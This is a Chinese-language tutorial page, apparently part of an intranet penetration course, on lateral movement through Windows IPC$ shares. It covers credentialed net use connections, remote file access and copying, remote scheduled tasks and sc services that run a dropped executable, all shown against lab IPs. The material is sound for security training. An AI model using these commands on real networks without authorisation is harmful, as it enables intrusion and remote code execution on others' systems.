内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
15IPC$横向移动
# 概述 > IPC$ IPC(Internet process connection)共享,为了实现进程间通信而开放的命名管道。 IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理和查看计算机的共享资源时使用。通过IPC$可以与目标机器建立连接,不仅可以访问目标机器的文件进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目标结构、用户列表等信息。  > 共享文件 文件共享指的是主动在网络上共享自己计算机中的文件,默认共享是为了方便管理员进行远程管理而默认开启的。 逻辑磁盘默认都是处于共享状态的。  访问的命令格式为 ``` \\IP地址\磁盘符$ ``` 注意:如果当前计算机A的用户账户是administrator,目标机器B上的账户也是administrator,且密码相同,则不需要输入密码就可以访问,默认会用本地账户密码进行认证。 ```\\ \\192.168.110.20\c$ ```  # IPC$连接方式 用户组连接 ``` net use \\IP\ipc$ "password" /user:"username" ``` 域用户连接 ``` net use \\域名\ipc$ "域成员密码" /user:域名\域成员账户 ``` 删除ipc$连接 ``` net use \\IP\ipc$ /del ``` # 利用条件 1、开启了139、445端口 IPC$可以实现远程登录及对默认共享资源的访问,445端口可以实现对共享文件打印机的访问,一般来讲需要445端口的支持。 2、管理员开启了默认共享 默认共享是为了访问管理员进行远程管理而默认开启的,包括所有的逻辑盘可以实现对这些默认共享目录的访问。 3、必须得知道对方机器的用户名和密码 注意:在内网中,很多计算机的账户密码都是一样的,故可以通过抓取本地计算机的账户密码,然后和对方的电脑进行IP连接 > 相关命令 查看共享资源 ``` net share ``` 删除C盘的共享 ``` net share c$ /del ``` 设置共享盘的名字 ``` net share xbxaq=D:\ #设置D盘共享,共享名字为xbxaq ``` ## 不同权限下的命令 IPC$建立连接之后,可执行系列命令: 查看远程计算机的盘符目录 ``` dir \\IP\c$ ```  查询远程计算机上的进程 ``` tasklist /S IP地址 ```  查看远端计算机上的文件内容 ``` type \\IP\c$\文件路径 ```  查询远端计算机上的时间 ``` net time \\IP地址 ```  将本地计算机的文件复制到远端计算机 ``` copy 文件 \\IP地址\C$ ```  >不同权限下执行相同的命令 | 不同权限/命令 | dir | type | net time | copy | | --------------- | -------------------- | -------------------- | -------------------- | -------------------- | | administrator | 可以 | 可以 | 可以 | 可以 | | 普通管理员 | 不可以 | 不可以 | 可以 | 不可以 | | 普通用户 | 不可以 | 不可以 | 可以 | 不可以 | | 域管理员 | 可以 | 可以 | 可以 | 可以 | | 普通域用户 | 不可以 | 不可以 | 可以 | 不可以 | | 域administrator | 不可以(只能和域控) | 不可以(只能和域控) | 不可以(只能和域控) | 不可以(只能和域控) | # 与计划任务配合横向 利用计划任务功能,可以将任何脚本、程序或者文档安排在某个最方便的时间运行,计划任务在每次系统启动的时候启动并在后台运行。 计划任务在Windows XP电脑上使用at命令,Windows XP之后的电脑使用的是schtasks命令  ``` #远程创建计划任务 schtasks /create /s 192.168.110.20 /u administrator /p a1b2c3.. /tn test /tr c:/1.txt /sc onstart /RU System /F schtasks /create /s 192.168.110.20 /tn test /tr c:/1.txt /sc onstart /RU System /F #运行计划任务 schtasks /run /s IP地址 /u username /p password /i /tn "计划任务名称" #删除计划任务 schtasks /delete /s IP地址 /u username /p password /tn "计划任务名称" /f ``` 注意:建立IPC认证之后,如果当前的用户是administrator,则不再需要账户密码 # 与Windows服务配合横向 Microsoft Windows 服务(即 以前的NT服务),能够创建在它们自己的Windows会话中且可长时间运行可执行的应用服务。 > 相关命令  创建服务 ``` sc \\IP地址 create test binpath= "cmd.exe /c c:\xbxaq.exe" binpath= "cmd.exe /c c:\xbxaq.exe" ===> 通过cmd程序运行在C盘下面的xbxaq.exe ``` 开启服务 ``` sc \\IP地址 start test ``` 删除服务 ``` sc \\IP地址 delete test ``` ## 与盘符映射横向 盘符映射就是将远程的共享磁盘映射到自己的电脑上,在已经建立IPC$连接的前提下,可以使用以下这个命令进行盘符映射。 ``` net use 本地盘符:\\IP地址\远程的盘符$ 例如: net use k:\\192.168.110.10\c$ 将ip10计算机上的C盘映射到本地的K盘上 ``` 
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码